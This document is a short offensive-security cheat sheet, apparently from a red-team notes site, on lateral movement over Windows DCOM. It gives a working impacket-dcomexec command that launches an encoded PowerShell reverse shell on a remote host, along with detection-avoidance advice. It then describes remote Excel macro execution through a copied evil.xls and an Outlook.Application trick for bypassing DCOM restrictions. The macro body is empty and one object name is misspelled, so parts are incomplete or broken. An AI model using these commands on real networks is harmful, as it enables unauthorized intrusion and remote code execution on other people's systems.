DCOM Lateral Movement

05.06.2024 · dadevel

Lateral Movement over DCOM.

Execute a reverse shell.

impacket-dcomexec -k -no-pass -nooutput srv01.corp.com "powershell.exe -ep bypass -e $(iconv -t utf16le ./shell.ps1 | base64 -w0)"

OpSec: The command output is written to a file and downloaded over SMB. This can be avoided by specifying -nooutput.

Untested tools:

  • DLHell, Python script for DCOM DLL proxying
  • CheeseDcom, implements many different methods in C#



Check target

$com = [activator]::CreateInstance([type]::GetTypeFromProgId('Excel.Application', ''))
$com | Get-Member

Create new Excel document. Select View/Macros, give the macro the name mymacro and insert the following VBA payload.

Sub mymacro()
End Sub

Then save the excel sheet in the old *.xls format.

Copy the document.

cp ./evil.xls \\\c$\evil.xls

When Excel is started trough DCOM it runs in system context and complains about missing folders in its home directory.

mkdir \\\c$\Windows\sysWOW64\config\systemprofile\Desktop

Run the macro.

$workbook = $com.Workbooks.Open('C:\evil.xls')

Outlook.Application + CPL file

Remote access to some DCOM objects is blocked. Outlook.Application can be used as a proxy to bypass this restriction.

Load CPL file via DCOM.

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("0006F033-0000-0000-C000-000000000046", "ws01.corp.com"))
$b = $a.CreateObject("Shell.Apllication")